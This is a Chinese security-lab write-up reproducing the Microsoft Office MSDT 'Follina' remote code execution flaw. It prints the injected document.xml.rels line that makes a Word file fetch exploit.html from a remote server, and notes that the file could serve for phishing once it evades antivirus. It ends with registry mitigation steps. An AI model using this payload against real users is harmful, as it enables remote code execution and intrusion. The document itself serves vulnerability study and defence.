Microsoft Office MSDT 远程代码执-漏洞文库小世界-安全文库-NGC660 安全实验室

Microsoft Office MSDT 远程代码执

漏洞简介

该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。Microsoft Defender 当前无法阻止执行。受保护的视图启动无需打开文档即可运行

影响版本

简单来说基本通杀

漏洞复现

先看网上的poc
https://github.com/chvancooten/follina.py

m_132d86cab0afbc86f3e386fdbccd61fc_r

m_93fd23101792e41448be0f7daa785ad6_r

大概意思为生成一个docx的文档和一个远程的html,猜测是通过打开docx来请求html里的命令,从而执行
我们这里把生成的docx文件复制到测试机器上进行测试,会出现程序兼容性(正常情况),并且成功弹出计算器。

m_a169980e833f87ce234f39ed8876768f_r

然后我们再来查看poc代码,发现是修改”src/docx/word/_rels/document.xml.rels” 里面的内容

m_6a78fcaea6b1aa4acb4925b192264a71_r

我们打开生成的docx和本地新建的docx进行document.xml.rels对比发现大概是多了这些内容:

<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://ip:80/exploit.html!x-usc:http://ip:80/exploit.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/></Relationships>

可以看到和我们猜想的情况一样是去请求服务器上的html文件来执行命令,所以需要把html文件放到可以访问的服务器上,然后修改“document.xml.rels”文件中的服务器地址,我们只需把想要执行的命令在服务端进行更改即可。

m_ff1dded62d45c94555a21cd7a4b4dcde_r

经过测试目前火绒、360已经可以识别,后续如果可以免杀可以当作钓鱼进行使用。

修复方案

目前微软暂未针对此漏洞发布安全补丁,提供了临时修复措施进行防护:

禁用MSDT URL协议

1、以管理员身份运行命令提示符。

2、备份注册表项后,执行命令

reg export HKEY_CLASSES_ROOT\ms-msdt filename
3、再执行命令

reg delete HKEY_CLASSES_ROOT\ms-msdt /f

参考链接

https://blog.csdn.net/qq_17754023/article/details/125112334?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-1-125112334-blog-125079226.pc_relevant_paycolumn_v3&spm=1001.2101.3001.4242.2&utm_relevant_index=4

请登录后发表评论

    请登录后查看回复内容